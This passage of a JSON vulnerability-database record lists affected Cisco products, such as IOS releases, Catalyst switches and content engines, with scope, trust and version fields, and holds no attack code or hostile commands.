            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1e",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1db",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1da",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1ay",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1ax",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1aa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1 e2",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "12.0xv"
          },
          {
            "_id": null,
            "model": "ios 12.0xu",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xs",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xr",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xq",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xp",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xn",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xm",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xi",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xe",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0wx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0wt",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0wc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0w5",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0t",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0sz",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0sx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0st",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0sl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0s",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0dc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0db",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0da",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 11.2sa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 11.2p",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 11.1cc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 11.1aa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "internet cdn content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7320"
          },
          {
            "_id": null,
            "model": "internet cdn content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "590"
          },
          {
            "_id": null,
            "model": "intelligent contact manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "intelligent contact manager",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "infocenter",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "igx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8400"
          },
          {
            "_id": null,
            "model": "hosting solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.3"
          },
          {
            "_id": null,
            "model": "hosting solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44900"
          },
          {
            "_id": null,
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4480"
          },
          {
            "_id": null,
            "model": "fasthub",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4001.0"
          },
          {
            "_id": null,
            "model": "fasthub",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "300"
          },
          {
            "_id": null,
            "model": "escon channel port adapter",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "device fault manager",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "css11800 content services switch",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "css11500 content services switch",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "css11150 content services switch",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "css11050 content services switch",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "css11000 content services switch",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "csm",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "cr-4430-b",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "content router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44304.1"
          },
          {
            "_id": null,
            "model": "content router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44304.0"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "73204.1"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "73204.0"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "73203.1"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "73202.2.0"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7320"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5904.1"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5904.0"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5903.1"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5902.2.0"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "590"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5604.1"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5604.0"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5603.1"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5602.2.0"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5074.1"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5074.0"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5073.1"
          },
          {
            "_id": null,
            "model": "content engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5072.2.0"
          },
          {
            "_id": null,
            "model": "content distribution manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4670"
          },
          {
            "_id": null,
            "model": "content distribution manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "46504.1"
          },
          {
            "_id": null,
            "model": "content distribution manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "46504.0"
          },
          {
            "_id": null,
            "model": "content distribution manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4650"
          },
          {
            "_id": null,
            "model": "content distribution manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "46304.1"
          },
          {
            "_id": null,
            "model": "content distribution manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "46304.0"
          },
          {
            "_id": null,
            "model": "content distribution manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4630"
          },
          {
            "_id": null,
            "model": "content delivery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4650"
          },
          {
            "_id": null,
            "model": "content delivery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4630"
          },
          {
            "_id": null,
            "model": "ciscoworks windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ciscosecure acs for windows and unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ciscosecure acs appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1111"
          },
          {
            "_id": null,
            "model": "catalyst series ssl services module",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6500"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60007.6(1)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60007.5(1)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60007.1(2)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60007.1"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60006.3(4)"
          },
          {
            "_id": null,
            "model": "catalyst pan",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60006.3"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60006.2(0.111)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60006.2(0.110)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60006.1(2.13)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60006.1(1)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60005.5(4)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60005.5(3)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60005.5(2)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60005.5(13)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60005.5(1)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60005.4.1"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60005.4(4)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60005.4(3)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60005.4(2)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60005.4(1)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60005.4"
          },
          {
            "_id": null,
            "model": "catalyst ws-x6380-nam",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60003.1"
          },
          {
            "_id": null,
            "model": "catalyst ws-svc-nam-2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60003.1"
          },
          {
            "_id": null,
            "model": "catalyst ws-svc-nam-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60003.1"
          },
          {
            "_id": null,
            "model": "catalyst ws-svc-nam-2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60002.2"
          },
          {
            "_id": null,
            "model": "catalyst ws-svc-nam-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60002.2"
          },
          {
            "_id": null,
            "model": "catalyst ws-x6380-nam",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60002.1"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50006.3(4)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50006.1(3)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50006.1(2)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50006.1(1)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50005.5(7)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50005.5(6)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50005.5"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50005.5(4)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50005.5(3)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50005.5(2)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50005.5(13)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50005.5(1)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50005.4.1"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50005.4(4)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50005.4(3)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50005.4(2)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50005.4(1)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50005.2(4)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50005.2(3)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50005.2(2)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50005.2(1)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50005.2"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50005.1(1)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50004.5(9)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50004.5(8)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50004.5(7)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50004.5(6)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50004.5(5)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50004.5(4)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50004.5(3)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50004.5(2)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50004.5(12)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50004.5(11)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "50004.5(10)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5000"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40007.6(1)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40007.5(1)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40007.1.2"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40007.1(2)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40007.1"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40006.3.5"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40006.3(4)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40006.1(1)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40005.5.5"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40005.5(4)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40005.5(3)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40005.5(2)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40005.5(13)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40005.5(1)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40005.4.1"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40005.4(3)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40005.4(2)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40005.4(1)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40005.4"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40005.2(7)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40005.2(6)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40005.2(5)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40005.2(4)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40005.2(2)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40005.2(1)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40005.1(1)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40004.5(9)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40004.5(8)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40004.5(7)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40004.5(6)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40004.5(5)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40004.5"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40004.5(4)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40004.5(3)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40004.5(2)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40004.5(10)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4000"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3900"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3000"
          },
          {
            "_id": null,
            "model": "catalyst supervisor software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "29xx2.4.401"
          },
          {
            "_id": null,
            "model": "catalyst supervisor software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "29xx2.1.1102"
          },
          {
            "_id": null,
            "model": "catalyst supervisor software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "29xx2.1.6"
          },
          {
            "_id": null,
            "model": "catalyst supervisor software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "29xx2.1.502"
          },
          {
            "_id": null,
            "model": "catalyst supervisor software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "29xx2.1.501"
          },
          {
            "_id": null,
            "model": "catalyst supervisor software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "29xx2.1.5"
          },
          {
            "_id": null,
            "model": "catalyst supervisor software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "29xx1.0"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2950"
          },
          {
            "_id": null,
            "model": "catalyst 2948g-l3",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catalyst 2948g-ge-tx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catalyst 2948g",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2920"
          },
          {
            "_id": null,
            "model": "catalyst xl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2900"
          },
          {
            "_id": null,
            "model": "catalyst lre xl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2900"
          },
          {
            "_id": null,
            "model": "catalyst xu",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "290012.0"
          },
          {
            "_id": null,
            "model": "catalyst sa6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "290011.2"
          },
          {
            "_id": null,
